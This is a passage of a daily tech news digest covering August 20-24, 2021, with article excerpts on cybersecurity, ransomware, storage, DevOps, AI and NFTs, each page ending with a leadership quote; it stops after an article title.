Daily Tech Digest - August 24, 2021

The CISO in 2021: coping with the not-so-calm after the storm

Naturally, the challenges facing the modern CISO are not focused on one front. Those on the receiving end of cyber attacks are of just as much concern as those behind them. More than half believe that users are the most significant risk facing their organisation. And just like the threats from the outside, there are several causing concern from within. Human error, criminal insider attacks and employees falling victim to phishing emails are just some of the issues keeping CISOs up at night. With many users now out of sight, working remotely, at least some of the time, these concerns are more pressing than they may once have been. Nearly half of UK CISOs believe that remote working increases the risk facing their organisation. And it’s easy to see why. Non-corporate environments tend to make us more prone to errors and misjudgement, and in turn, more vulnerable to cyber attack. Working from home also calls for slight alterations to security best practice. The use of personal networks and devices may require increased protocols and protections.


How do I select an automated red teaming solution for my business?

There are, however, tools that can help train defenders or aid in discovering gaps in defensive investment. There are three initial considerations for these tools. For the best defenders, identifying behavior, not static signatures or tools, is crucial. By correlating events and telemetry, they can spot new / unknown tools and react faster. To create this, the simulation tool must run complex chains of techniques based on the environment; checking the OS, downloading an implant, executing persistence, then searching local files before moving laterally, as an example. Secondly, the solution’s techniques must be relevant, basing them on updated imitations of those observed from real actors. Use of threat intelligence will benchmark against genuine attackers instead of generic outdated threats, decreasing the likelihood of defensive gaps. Finally, being able to get metrics on the performance of the current defensive set-ups it requires the solution to integrate with the SIEM. Without this, the ability to gain evidence on MITRE mapped control failing becomes cumbersome and error prone.


What Enterprises Can Learn from Digital Disruption

Operating in today's climate means updating mindsets, processes, budgeting cycles, incentive systems and traditional ways of working. It's not about ping pong tables and arcade rooms. It's being better at delivering on core competencies than competitors and having the digital savviness required to succeed in a digital-first world. However, the most valuable trait is curiosity because curiosity leads to experimentation, innovation, optimization, and learning. “Disruptors face the challenge of explaining the concept and the benefits of the new approach. Many organizations struggle to grasp it and operate under the inertia of business as usual,” says Greg Brady, founder and chairman of supply chain control tower provider One Network Enterprises. “The COVID-19 pandemic has opened the eyes of many executives to the shortcomings of the old way of doing business.” Some organizations attempt to mimic what the digital disrupters do. However, their success tends to depend on the context in which the concept was executed.


Break the Cycle of Yesterday's Logic in Organizational Change and Agile Adoption

Like Tibetan-prayer-wheels, each framework promises to be the best business changer if one follows their special consultancy. Affected by the marketing machinery, executives and senior managers pick one of them. Hoping it will suit them instead of looking to their inner and outer organizational opportunities and boundaries to find real value adding outcomes for their business. These artificial dual operating systems get designed alongside the line organisations with their job descriptions, hierarchies, performance contracts, engineering models and cultural values. Hurdles are preprogramed because for many technical driven enterprises, industrial standards simply don’t scale with agile frameworks. A logical inference is that the necessary variety is very much lost. Operationalization of variety with minimal investment costs are entrapped. Consequently, the change system behavior will be like dandelion seeds - the change will take time, costs will spread, and development transaction costs will increase.


How to choose the best NVMe storage array

NVMe’s parallelism is fundamental to its value. Where SAS-based storage supports a single message queue and 256 simultaneous commands per queue, NVMe ramps this all the way up to 64,000 queues, each with support for 64,000 simultaneous commands. That massive increase is key to enabling you to ramp up the number of VMs on a single physical host, driving greater efficiency and easing management. Identifying individual workloads and planning for growth over time--along with high availability needs and continuity requirements (backup/restore, replication, geo-redundancy, or simply disaster recovery)--can help paint a picture of what you need in an NVMe array. While each of these considerations has the potential to drive up the initial cost of whichever NVMe array you select (or multiple arrays, when you consider redundancy), smart investments that match your needs ultimately reduce your cost of ownership in the long run. NVMe arrays are big-ticket items, so efficient storage practices are critical to making the most of the hardware you buy and extending the lifecycle of your storage media.


Progressive Delivery: A Detailed Overview

In a traditional waterfall model, teams release new features to an entire user base at one time. Using progressive delivery, you roll out features gradually. Here’s how it works: DevOps managers first ship a new feature to release managers for internal testing. Once that’s done, the feature goes to a small batch of users to collect additional feedback, or is incrementally released to more users over time. The final step is a general launch when the feature is ready for the masses. It’s a bit like dipping your toes into the water before diving in. If something goes wrong during a launch, you haven’t exposed your entire user base to it. You can easily roll the feature back if you need to and make changes. Progressive delivery emerged in response to widespread dissatisfaction with the continuous delivery model. DevOps teams needed a way to control software releases and catch issues early on instead of pumping out bug-filled versions to their users, and progressive delivery met this requirement.


Employees Can Be Insider Threats to Cybersecurity. Here's How to Protect Your Organization.

Politics are another strong motivation for employees to become insider threats. For example, an employee might be upset with his or her work situation or job title but can't see a way to fix it because of inter-office politics. This could lead to that employee becoming disgruntled and wanting to take revenge on the company. This situation is common in enterprise-level organizations, where management doesn't take the time to get to know their employees or address their concerns. Providing an environment where employees can reach their full potential and have open lines of communication with their chain of command can help mitigate potential political concerns. This ties closely to professional reasons. For example, employees might feel slighted after being passed over for a promotion, or they might be the target of an internal investigation for misconduct. On the other hand, they could find themselves the target of misconduct by a peer or boss, which could lead them to take matters into their own hands. Humans are emotional creatures, and this, of course, applies to employees as well. 


Three reasons why ransomware recovery requires packet data

SecOps team members or external consultants can comb through the data to find the original malware that caused the attack, determine how it got onto the network in the first place, map how it traversed the network and determine which systems and data were exposed. Note that the storage capacity required to store even a week’s worth of packet data can quickly become prohibitively expensive for high-speed networks. To have a realistic chance of storing a large enough buffer, these organizations will need to be smart about where to capture and how much to capture. One way to do this is to use intelligent packet filtering and deduplication by front-ending the packet capture devices with a packet broker to reduce the amount of data saved. Another method is using integrations between the security tools and the capture devices to only capture packet data correlated with incidents or high alerts. Using a rolling buffer strategy to overwrite the data after a “safe period” has passed will also reduce storage requirements. 


The key to mobile security? Be smarter than your device

What people often forget is that the shiny all-singing, all-dancing device in their pocket is also a highly capable surveillance device, boasting advanced sensory equipment (camera and microphone), and a wealth of tracking information. People just assume that their mobile device is secure and often use it with less care (from a security point of view) for things that they wouldn’t do on a laptop. To this end, we now have a vast industry that sets out to secure and empower productivity on the basis that people can work anywhere and often use their devices for both work and personal use. Mobility and cloud technology have become essential with most people now working and managing their personal lives in a digital fashion. To coin a saying from the world of Spiderman (slightly out of context) — with great power comes great responsibility. We now live in a world where the once humble communication device is now a very powerful tool that needs to be used responsibly in the face of those wishing to act in a nefarious way. 


How to Develop a Data-Literate Workforce

You probably already know the importance of data literacy, but to frame this article, let's position the benefits in a modern data governance setting. The best way to do so is to use an example where the absence of data literacy led to disastrous consequences. There are many well-known examples of data literacy issues leading to extreme failures. However, one of the most significant occurred at NASA in 1999 and led to the loss of a $125 million Mars probe. The probe burnt up as it descended through the Martian atmosphere because of a mathematical error caused by conflicting definitions. The navigation team at NASA's Jet Propulsion Laboratory (JPL) worked in the metric system (meters and millimeters), while Lockheed Martin Astronautics, the company responsible for designing and building the probe, provided the navigation team with acceleration data in imperial measurements (feet, pounds, and inches). Because there were no common terms or definitions in place, the JPL team read the data inaccurately and failed to quantify the speed at which the craft was accelerating. The result was catastrophic, but it could have been easily avoided if a system of data literacy had been in place.



Quote for the day:

"The first key to leadership is self-control" -- Jack Weatherford

Daily Tech Digest - August 23, 2021

Is this the end of the Point of Sale (PoS)?

The best part of all about this, in my opinion, is the further digital acceleration it affords us. It allows you to retire old equipment that’s often temperamental; you get to integrate quicker; and you get to deliver new digital interactions far quicker than waiting for a PoS integration team. Testing becomes simplified, and all devices become commodity mobile phones and tablets. The icing on the cake is that the barrier for entry is incredibly low; you can integrate with a payment system for next to no cost, and being a service provider, they’ve made it as simple as possible. The integration of an app-based PoS into an app ecosystem allows for a single, seamless journey that’s personal to the customer, empowering, and overall just a better experience for many users. However, one of the hurdles to get over is the level of app installation fatigue, as not everybody wants an app per place they visit. This is a huge opportunity for Uber equivalents to come in and provide a unified platform (which is working well for things like food delivery), as mobile-first web apps aren’t always a very slick experience.


World Bank Launches Global Cybersecurity Fund

The new cybersecurity initiative aims to accelerate digital transformation by improving governments' technical capabilities and their efforts to increase security awareness. A spokesperson for the World Bank tells Information Security Media Group that associated funds will be disbursed "using diverse implementation models" to catalyze specific cybersecurity investments. The amount of funding to be provided was not revealed. The bank calls particular attention to security investments that improve critical infrastructure - including the energy, transportation, finance and healthcare sectors. "These systems [designed prior to, or during the early years of the digital revolution] … are today highly vulnerable to cybersecurity attacks with possibly serious outcomes," the bank says on the fund's dedicated webpage. The World Bank spokesperson says its new funding can help improve cybersecurity awareness at the national level and enable governments to identify risks, fund technical solutions and prepare for infrastructure investments.


How attackers could exploit breached T-Mobile user data

T-Mobile is offering all impacted customers a free two-year subscription for McAfee's ID Theft Protection Service, which includes credit monitoring, full-service identity restoration, identity insurance, dark web monitoring, and more. Business and postpaid customers can also enable T-Mobile's Account Takeover Protection service for free and all T-Mobile users can use the company's Scam Shield app that enables caller ID and automatically blocks calls flagged as scams. More generally, all mobile subscribers should check with their carriers what options they have to secure their accounts against SIM swapping or number porting and they should enable that additional verification. Using text messages or phone calls for two-factor authentication should be disabled where possible in favor of two-factor authentication via a mobile app or a dedicated hardware token, especially for high-value accounts. Email accounts are high-value accounts because they are used to confirm password reset requests for most other online accounts. Finally, be wary of email or text messages that ask for sensitive information such as passwords, PINs, access tokens, or that direct you to websites that ask for such information


Open Banking Transforming Business Models Forever

The potential to use APIs to broaden relationships and improve the customer experiences has exploded over the past decade, with platform organizations such as Apple, Google, Amazon. Uber and Facebook using the model to grow exponentially and grab significant market share from established firms, including banks and credit unions. But, you don’t have to be a tech giant to benefit from APIs — the opportunity is being leveraged in virtually every industry and by organizations of all sizes. In fact, small and midsize financial institutions that want to reach digital audiences beyond their existing geography or traditional product set can leverage open APIs. The options include creating an independent platform, partnering to jointly create a platform, or becoming part of another platform’s ecosystem. And there are many third-party solution providers who are willing to assist. According to the Harvard Business Review, “Smaller firms could have an agility advantage by unbundling their capabilities, designing for their consumers, and exploiting opportunities in their respective ecosystems.


10 Tips to Overcome Obstacles of AI-Enabled Digital Transformation

The bottom line: don’t add too many unknowns to your transformation program. AI projects require iterative testing and evolution of supporting processes and clean, consistent, well-architected data is the price of admission. Don’t assume that the data is in place and usable for the target process, and don’t take the promises of vendors or status of program leaders far removed from the front lines as reality. The best way to determine whether supporting processes and data are at the level required for success is through competitive benchmarking, internal benchmarking, heuristic evaluations, and maturity assessments. You need objective metrics to know if your data is adequate. A heuristic (collection of best practices and rules of thumb) evaluation can provide a snapshot of how well the organization is doing on current efforts. What does the organization have to work with? Are foundational processes and data quality strong? Or does strengthening the foundation require significant time and effort? A maturity assessment cuts across multiple dimensions that may appear beyond the scope of the domain but would impact downstream processes for a given area.


Defence in Depth – Time to start thinking outside the box

By embedding another link within an article, linked to from an email, this lured the recipient into clicking a bad link, and bypassed the normal scanning tools. This illustrates that even with anti-phishing in place, defences can still be breached. So, what could have been done to prevent this? Firstly, you might be asking why the IPS solution didn’t prevent this in the first place. Normally, it would; however, these days, we are mostly at home, so the average home router does not have this functionality and people are not always connected to a VPN. To analyse what went wrong, and to prevent further attacks, we firstly checked the Cyber-attack Chain, or the Mitre Att&ck framework. This is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. This helped us to understand how an attacker had bypassed the previous measures. When we dug deeper, we saw there had been a successful Defence Evasion; the email solution was exploited by allowing a phishing email through. This could have easily led to Credential Access or Installation with further persistence. 


Counterintuitive Strategies for the Digital Economy

The most common explanations include running out of capital, underestimating the competition, or overinvesting in the product. “Many companies think ‘if I add in another feature I’ll grow,’ but companies which are more focused on the fit and how to address it to the buyer tend to do better,” said Finkeldey. Other reasons to fail include incorrect go-to-market business models, a lack of business model fit, and poor marketing. This last one was an interesting inclusion and was backed up with some Gartner research. Often, marketing, brand building, and thought leadership can be seen as luxuries, but they are key to opening up new markets and achieving growth and success. Finkeldey’s Gartner colleague Alastair Woolcock pointed out that around 47% of the operational spend could be on sales and marketing among successful companies in the SaaS space. For those spending much less than that, say up to 15%, just increasing it by 5% or 10% was not the answer. “Stepping in half the way only gets them half the way,” said Woolcock. So, while the temptation is to “run and hire a bunch of sellers,” outsourcing this function was often misplaced investment in the current market.


Why automated pentesting won’t fix the cybersecurity skills gap

Security teams need to have the adversarial or hacker mindset – i.e., they have to think as an attacker. They need to stay a step ahead of the cyber criminals and advise the rest of the organization on the important and timely actions to take. Not every vulnerability is obvious. The best way to defend the enterprise is for defenders to think like attackers and try harder every time they seemingly hit a dead-end – not giving up easily on something they see that doesn’t make sense. Successfully defending systems, networks, and applications requires not only an understanding of the tools an attacker could use, but how they use them and when they use them. This requires a lot of judgement calls, asking a lot of questions that start with “why”, and those cannot be accomplished with automated tests. Automated tests are only as good as what you tell them to look for and do. What makes security hard is that each time, the attacker is doing something different and new. Attackers don’t need a massive vulnerability to impact organizations – they are patient, waiting for an individual to make a mistake to let them in, either via phishing or social engineering.


Hackers are getting better at their jobs, but people are getting better at prevention

One of the other issues, though, that you should realize is that even if there is going to be federal legislation, it's only going to make a difference if it overrides and preempts state laws, and the states do not want that to happen. The states want to protect their own people, and any law that would be adopted on the federal level would be unlikely to be as comprehensive as some of the state laws. But in any case, I'll tell you that in order to comply with these laws, any one of them, California for example, requires a great deal of work. It requires an understanding of all the data you collect, who has access to that data, where it's stored, who uses that data, who in your supply chain is involved in that project. And that is a very, very big endeavor. Now, it's a very valuable endeavor because a company that understands its collection and use of data is going to understand its business much, much better. I've actually seen companies that go through that process and realize that they can improve their businesses, but it's like going on a diet and working out. 


Top 6 Time Wastes as a Software Engineer

There's a delicate balance that you've to take care of while choosing between automation and manual testing. So let's understand how you, as a software engineer, can use this to work out an efficient testing strategy. It's easy to write a small manual test to ensure that the new feature you added is working fine. But when you scale, running those manual tests needs more hours off the clock, especially when you're trying to find that pesky bug that keeps breaking your code. If your application or website has many components, the chances of you not running a specific test by mistake also increase. Automated tests or even a system to run tests more efficiently helps avoid this. You would need to spend a bit more time setting up your automated tests. Once they are written, though, they can be reused and triggered as soon as you make any code changes. So you don't have to manually re-test previous functions just because you added a new one. Conversely, choosing the right tasks to automate is just as important. Unfortunately, it is one of the most common mistakes of QA automation testing. It's tempting to fall into the trap of over-automating things and end up replicating tests script-by-script.



Quote for the day:

"Successful leadership requires positive self-regard fused with optimism about a desired outcome." -- Warren Bennis

Daily Tech Digest - August 22, 2021

Move Fast Without Breaking Things in ML

The first step in the response to the problem has happened even before you got invited to the call with your CTO. The problem has been discovered and the relevant people have been alerted. This is likely the result of a metric monitoring system that is responsible for ensuring important business metrics don’t go off track. Next using your ML observability tooling, which we will talk a bit more about in a second, you are able to determine that the problem is happening in your search model since the proportion of users who are engaging with your top n-links returned has dropped significantly. After learning this you rely on your model management system to either roll back to your previous search ranking model or deploy a naive model that can hold you over in the interim. This mitigation is what stops your company from losing (as much) money every minute since every second counts for users being served incorrect products. Now that things are somewhat working again, you need to look back to your model observability tools to understand what happened with your model.


Ransomware is the top cybersecurity threat we face, warns cyber chief

Not only are cyber-criminal ransomware groups encrypting networks and demanding a significant payment in exchange for the decryption key, now it's common for them to also steal sensitive information and threaten to release it unless a ransom is paid – often leading victims to feel as if they have no choice but to give in to the extortion demands. "As the business model has become more and more successful, with these groups securing significant ransom payments from large profitable businesses who cannot afford to lose their data to encryption or to suffer the down time while their services are offline, the market for ransomware has become increasingly professional," Cameron will say. Ransomware is successful because it works; in many cases, because organisations still don't have the appropriate cyber defences in place to prevent cyber criminals infiltrating their network in the first place in what the NCSC CEO describes as "the cumulative effect of a failure to manage cyber risk and the failure to take the threat of cyber criminality seriously".


Become software engineers, not software integrators.

Ever since its inception, the IT industry has been evolving every day, by giving better and more awesome technology experiences to end-users. On the other hand, the industry has also continually focused on reducing the development time and cycle for software engineering teams. A significant portion of IT engineers & organizations are motivated to ease the development process. This in turn has become a race to give the best technologies (frameworks, tools, etc.) to engineering teams. In this race, their focus has gradually shifted from “ease of development” to almost “no development at all”, i.e. making tools, which allow the engineers to just integrate stuff to provide the final product. Essentially, plug and play. Of course, the big advantages because of this are that: Now the companies which are building software for businesses can focus more on business ideas; and With a reduced development cycle, companies can build many more software products. However, the concern starts when engineers, who get used to the plug & play tools, start losing core engineering skills like optimizing, maturing, and architecting the code.


How External IT Providers Can Adopt DevOps Practices

The key is to overcome waterfall thinking. A modern supplier will work in small batches and will use an experimental approach to product development. The supplier’s product development team will create hypotheses and valid them with small product increments, ideally in production. According to my experience, many IT suppliers use agile software development and Continuous Integration these days. But they stop their iterative approach at the boundary to production. One problem of having separated silos for development and operations is that in most cases these two silos have different goals (dev = throughput, ops = stability), Diener mentioned. In contrast, a DevOps team has a common business goal. ... In order to adopt DevOps practices, the supplier has to find out what his client’s goal is. It has to become the supplier’s goal as well. We at cosee use product vision workshops to shape and document the client’s goal (impact) and its user’s needs (outcome). That’s a prerequisite for an iterative and experimental product development approach.


Blockchain in Space: What’s Going on 4 Years After the First Bitcoin Transaction in Orbit?

The growth in both scale and affordability of space exploration is creating a whole new sector — the Space Economy, as the United Nations Office for Outer Space Affairs already calls it. An inevitable question then arises: what money will the players in this space economy use? ... Despite all the advances, space exploration often remains a costly business, both in money and science capital. Because of that high cost nature, any large project in space requires the cooperation of numerous private companies, each providing resources and talent. And the most ambitious programs are collaborations between governments — not all of which necessarily put a lot of trust in each other. This is where one of blockchain’s key advantages comes in: it enables the exchange of value and data between independent parties in a way that doesn’t involve trust. With smart contracts, peer-to-peer transaction settlement, and the transparency and accountability enabled by public blockchain records


Upcoming Trends in DevOps and SRE in 2021

Service meshes are quickly becoming an essential part of the cloud-native stack. A large cloud application may require hundreds of microservices and serve a million users concurrently. A service mesh is a low-latency infrastructure layer that allows high traffic communication between different components of a cloud application(databases, frontends, etc.) This is done via application programming interfaces (APIs). Most distributed applications today have a load balancer that directs traffic; however, most load balancers are not equipped to deal with a large number of dynamic services whose locations/counts vary over time. To ensure that large volumes of data are sent to the correct endpoint, we need tools that are more intelligent than traditional load balancers. This is where Service Meshes come into the picture. In typical microservice applications, the load balancer or firewall is programmed with static rules. However, as the number of microservices increases and the architecture changes dynamically, these rules are no longer enough. 


How GPT-3 and Artificial Intelligence Will Destroy the Internet

As a natural language processor and generator, GPT-3 is a language learning engine that crawls existing content and code to learn patters, recognizes syntax and can produce unique outputs based on prompts, questions and other inputs. But GPT-3 is more than just for use by content marketers as witness by the recent OpenAI partnership with Github for creating code using a tool dubbed “Copilot.” The ability to use autoregressive language modeling doesn’t just apply to human language, but also various types of code. The outputs are currently limited, but its future potential use could be vast and impacting. How GPT-3 is Currently Kept at Bay With current beta access to the OpenAI API, we developed our own tool on top of the API. The current application and submission process with OpenAI is stringent. Once an application has been developed before it can be released to the public for use in any commercial application, OpenAI requires a detailed submission and use case for approval by the OpenAI team. 


NFTs, explained

“Non-fungible” more or less means that it’s unique and can’t be replaced with something else. For example, a bitcoin is fungible — trade one for another bitcoin, and you’ll have exactly the same thing. A one-of-a-kind trading card, however, is non-fungible. If you traded it for a different card, you’d have something completely different. You gave up a Squirtle, and got a 1909 T206 Honus Wagner, which StadiumTalk calls “the Mona Lisa of baseball cards.” (I’ll take their word for it.) At a very high level, most NFTs are part of the Ethereum blockchain. Ethereum is a cryptocurrency, like bitcoin or dogecoin, but its blockchain also supports these NFTs, which store extra information that makes them work differently from, say, an ETH coin. It is worth noting that other blockchains can implement their own versions of NFTs. (Some already have.) NFTs can really be anything digital (such as drawings, music, your brain downloaded and turned into an AI), but a lot of the current excitement is around using the tech to sell digital art.


Demystifying AI: The prejudices of Artificial Intelligence (and human beings)

In a way, the results of these algorithms hold a mirror to human society. They reflect and perhaps even amplify the issues already present. We know that these algorithms need data to learn. Their predictions are only as good as the data they are trained on and the goal they are set to achieve. The data needed to train these algorithms is huge (think millions and above). Suppose we are trying to develop an algorithm to identify cats and dogs from pictures. Not only do we need thousands of pictures of cats and dogs, but they should be labeled (say the cat is class 0 and dog is class 1) so that the algorithm can understand. We can download these images off the internet (the ethics of which is questionable), but still, they need to be labeled manually. Now, consider the complexity and effort required to correctly label a million images in one thousand classes. Often this labeling task is done by “cheap labor” who may or may not have the motivation to do it correctly, or they simply make mistakes. Another problem in the data set is that of class imbalance. 


Three Mistakes That Will Ruin Your Multi-Cloud Project (and How to Avoid Them)

A multi-cloud strategy only augments the likelihood of experiencing one of these errors. The complexity of multiple clouds provides an extended attack surface for threat actors. An increased number of services means a higher chance of experiencing a misconfiguration or data leak. Centralized visibility and management are necessary to combat risk and ensure protection and compliance across multi-cloud environments. Proper governance requires a full view of the cloud, complete with resource consumption, how new services are accessed, and systems in place for risk mitigation, including data and privacy policies and processes. Rather than a cyclically executed process, risk management must be continuous and contain various coordinated actions and tasks in order to oversee and manage risks. An ecosystem-wide framework going beyond traditional IT is necessary for proper risk management. Enterprises must therefore prioritize training and awareness within their organization, teaching team members how to securely use multiple cloud services. 



Quote for the day:

"Integrity is the soul of leadership! Trust is the engine of leadership!" -- Amine A. Ayad

Daily Tech Digest - August 21, 2021

Can AGI take the next step toward genuine intelligence?

To take the next step on the road to genuine intelligence, AGI needs to create its underpinnings by emulating the capabilities of a three-year-old. Take a look at how a three-year-old playing with blocks learns. Using multiple senses and interaction with objects over time, the child learns that blocks are solid and can’t move through each other, that if the blocks are stacked too high they will fall over, that round blocks roll and square blocks don’t, and so on. A three-year-old, of course, has an advantage over AI in that he or she learns everything in the context of everything else. Today’s AI has no context. Images of blocks are just different arrangements of pixels. Neither image-based AI (think facial recognition) nor word-based AI (like Alexa) has the context of a “thing” like the child’s block which exists in reality, is more-or-less permanent, and is susceptible to basic laws of physics. This kind of low-level logic and common sense in the human brain is not completely understood but human intelligence develops within the context of human goals, emotions, and instincts. Humanlike goals and instincts would not form the best basis for AGI.


How to take advantage of Android 12’s new privacy options

First and foremost in the Android 12 privacy lineup is Google’s shiny new Privacy Dashboard. It’s essentially a streamlined command center that lets you see how different apps are accessing data on your device so you can clamp down on that access as needed. ... Next on the Android 12 privacy list is a feature you’ll occasionally see on your screen but whose message might not always be obvious. Whenever an app is accessing your phone’s camera or microphone — even if only in the background — Android 12 will place an indicator in the upper-right corner of your screen to alert you. When the indicator first appears, it shows an icon that corresponds with the exact manner of access. But that icon remains visible only for a second or so, after which point the indicator changes to a tiny green dot. So how can you know what’s being accessed and which app is responsible? The secret is in the swipe down: Anytime you see a green dot in the corner of your screen, swipe down once from the top of the display. The dot will expand back to that full icon, and you can then tap it to see exactly what’s involved.


Achieving Harmonious Orchestration with Microservices

The interdependency of your microservices-based architecture also complicates logging and makes log aggregation a vital part of a successful approach. Sarah Wells, the technical director at the Financial Times, has overseen her team’s migration of more than 150 microservices to Kubernetes. Ahead of this project, while creating an effective log aggregation system, Wells cited the need for selectively choosing metrics and named attributes that identify the event, along with all the surrounding occurrences happening as part of it. Correlating related services ensures that a system is designed to flag genuinely meaningful issues as they happen. In her recent talk at QCon, she also notes the importance of understanding rate limits when constructing your log aggregation. As she pointed out, when it comes to logs, you often don’t know if you’ve lost a record of something important until it’s too late. A great approach is to implement a process that turns any situation into a request. For instance, the next time your team finds itself looking for a piece of information it deems useful, don’t just fulfill the request, log it with your next team’s process review to see whether you can expand your reporting metrics.


How Ready Are You for a Ransomware Attack?

Setting the bar high enough to protect against initial entry is a laudable goal, but also adheres to the law of diminishing returns. This means the focus must shift towards improving how difficult it is for an attacker to move around your environment once they have gotten inside. This phase of the attack often requires some manual control, so identifying and disrupting command and control (C2) channels can pay significant dividends – but realize that only the least sophisticated attacker will reuse the same domains and IPs of a previous attack. So rather than looking for C2 communications via threat intel feeds, your approach needs to be to look for patterns of behavior which look like remote-access trojans (RATs) or hidden tunnels (suspicious forms of beaconing). Barriers to privilege escalation and lateral movement come down to cyber-hygiene related to patching (are there easily accessible exploits for local privilege escalation?), rights management (are accounts granted overly generous privileges?) and network segmentation (is it easy to traverse the network?). Most of the current raft of ransomware attacks have utilized the serial compromise of credentials to move from the initial point-of-entry to more useful parts of the network.


The rise and fall of merit

Wooldridge identifies Plato’s Republic as the origin of the concept of meritocracy, in which the Athenian philosopher imagined a society run by an intellectual elite, “who have the ability to think more deeply, see more clearly and rule more justly than anyone else.” Crucially, Plato’s ruling class was remade each generation—aristocrats were not assumed to pass on their talents—and it prized women as highly as men. Wooldridge finds meritocratic leanings in other pre-modern societies, including China, which began in the fifth century to use exams to recruit civil servants. But it was the expansion of the state in Europe in the early modern period that saw meritocracy first take root, albeit in a paradoxical way. As states expanded, demand for capable bureaucrats outgrew the ability of the aristocracy to produce them. The solution was to look downward and offer patronage to talented lowborns. Men such as French dramatist Jean Racine; London diarist Samuel Pepys; economist Adam Smith; and Henry VIII’s right-hand man, Thomas Cromwell, were all plucked from obscurity by favoritism. 


Intel Advances Architecture for Data Center, HPC-AI and Client Computing

This x86 core is not only the highest performing CPU core Intel has ever built, but it also delivers a step function in CPU architecture performance that will drive the next decade of compute. It was designed as a wider, deeper and smarter architecture to expose more parallelism, increase execution parallelism, reduce latency and increase general purpose performance. It also helps support large data and large code footprint applications. Performance-core provides a Geomean improvement of about 19%, across a wide range of workloads over our current 11th Gen Intel® Core™ architecture (Cypress Cove core) at the same frequency. Targeted for data center processors and for the evolving trends in machine learning, Performance-core brings dedicated hardware, including Intel's new Advanced Matrix Extensions (AMX), to perform matrix multiplication operations for an order of magnitude performance – a nearly 8x increase in artificial intelligence acceleration.1 This is architected for software ease of use, leveraging the x86 programing model.


A Soft, Wearable Brain–Machine Interface

Being both flexible and soft, the EEG scalp can be worn over hair and requires no gels or pastes to keep in place. The improved signal recording is largely down to the micro-needle electrodes, invisible to the naked eye, which penetrate the outermost layer of the skin. "You won't feel anything because [they are] too small to be detected by nerves," says Woon-Hong Yeo of the Georgia Institute of Technology. In conventional EEG set-ups, he adds, any motion like blinking or teeth grinding by the wearer causes signal degradation. "But once you make it ultra-light, thin, like our device, then you can minimize all of those motion issues." The team used machine learning to analyze and classify the neural signals received by the system and identify when the wearer was imagining motor activity. That, says Yeo, is the essential component of a BMI, to distinguish between different types of inputs. "Typically, people use machine learning or deep learning… We used convolutional neural networks." This type of deep learning is typically used in computer vision tasks such as pattern recognition or facial recognition, and "not exclusively for brain signals," Yeo adds. 


How to proactively defend against Mozi IoT botnet

While the botnet itself is not new, Microsoft’s IoT security researchers recently discovered that Mozi has evolved to achieve persistence on network gateways manufactured by Netgear, Huawei, and ZTE. It does this using clever persistence techniques that are specifically adapted to each gateway’s particular architecture. Network gateways are a particularly juicy target for adversaries because they are ideal as initial access points to corporate networks. Adversaries can search the internet for vulnerable devices via scanning tools like Shodan, infect them, perform reconnaissance, and then move laterally to compromise higher value targets—including information systems and critical industrial control system (ICS) devices in the operational technology (OT) networks. By infecting routers, they can perform man-in-the-middle (MITM) attacks—via HTTP hijacking and DNS spoofing—to compromise endpoints and deploy ransomware or cause safety incidents in OT facilities. In the diagram below we show just one example of how the vulnerabilities and newly discovered persistence techniques could be used together.


CBAP certification: A high-profile credential for business analysts

CBAP is the most advanced of IIBA’s core sequence of credentials for business analysts. It follows the Entry Certificate in Business Analysis (ECBA) and the Certification for Competency in Business Analysis (CCBA). As you might expect, the requirements get more extensive as you climb the ladder: CBAP requires more training, work experience, and knowledge area expertise. AdaptiveUS, a company that offers training for all of IIBA’s certs, breaks down the various requirements, but the important thing to know is that CBAP holders are at the top of the heap; while you don’t need to have the lower-level certs to get your CBAP certification, you should be fairly well established in your career as a BA before you consider it. Like IIBA’s other certs, the CBAP draws from A Guide to the Business Analysis Body of Knowledge, also known as the BABOK Guide. The BABOK Guide is a publication from IIBA that aims to serve as a bible for the business analysis industry, collecting best practices from real-world practitioners. It was first published in 2005 and is continuously updated. 


A Short Introduction to Apache Iceberg

Partitioning reduces the query response time in Apache Hive as data is stored in horizontal slices. In Hive partitioning, partitions are explicit and appear as a column and must be given partition values. Due to this approach, Hive having several issues like not being able to validate partition values is so fully dependent on the writer to produce the correct value, 100% dependent on the user to write queries correctly, Working queries are tightly coupled with the table’s partitioning scheme, so partitioning configuration cannot be changed without breaking queries, etc. Apache Iceberg introduces the concept of hidden partitioning where the reading of unnecessary partitions can be avoided automatically. Data consumers that fire the queries don’t need to know how the table is partitioned and add extra filters to their queries. Iceberg partition layouts can evolve as needed. Iceberg can hide partitioning because it does not require user-maintained partition columns. Iceberg produces partition values by taking a column value and optionally transforming it.



Quote for the day:

"Be willing to make decisions. That's the most important quality in a good leader." -- General George S. Patton, Jr.

Daily Tech Digest - August 20, 2021

Identity security: a more assertive approach in the new digital world

Perimeter-based security, where organisations only allow trusted parties with the right privileges to enter and leave doesn’t suit the modern digitalised, distributed environment of remote work and cloud applications. It’s just not possible to put a wall around a business that’s spread across multiple private and public clouds and on-premises locations. This has led to the emergence of approaches like Zero-Trust – an approach built on the idea that organisations should not automatically trust anyone or anything – and the growth of identity security as a discipline, which incorporates Zero-Trust principles at the scale and complexity required by modern digital business. Zero-Trust frameworks demand that anyone trying to access an organisation’s system is verified every time before granting access on a ‘least privilege’ basis, which is particularly useful in the context of the growing need to audit machine identities. Typically, they operate by collecting information about the user, endpoint, application, server, policies and all activities related to them and feeding it into a data pool which fuels machine learning (ML).


How Can We Make It Easier To Implant a Brain-Computer Interface?

As for implantable BCIs, so far there is only the Blackrock NeuroPort Array (Utah Array) implant, which also has the largest number of subjects implanted and the longest documented implantation times, and the Stentrode from Synchron, that has just recorded its first two implanted patients. The latter is essentially based on a stent that is inserted into the blood vessels in the brain and used to record EEG-type data (local field potentials (LFPs)). It is a very clever solution and surgical approach, and I do believe that it has great potential for a subset of use cases that do not require the high level of spatial and temporal resolution that our electrodes are offering. I am also looking forward to seeing the device’s long term performance. Our device records single unit action potentials (i.e., signals from individual neurons) and LFPs with high temporal and spatial resolution and high channel count, allowing significant spatial coverage of the neural tissue. It is implanted by a neurosurgeon who creates a small craniotomy (i.e., opens a small hole in the skull and dura), inserts the devices in the previously determined location by manually placing it in the correct area.


Artificial Intelligence (AI): 4 characteristics of successful teams

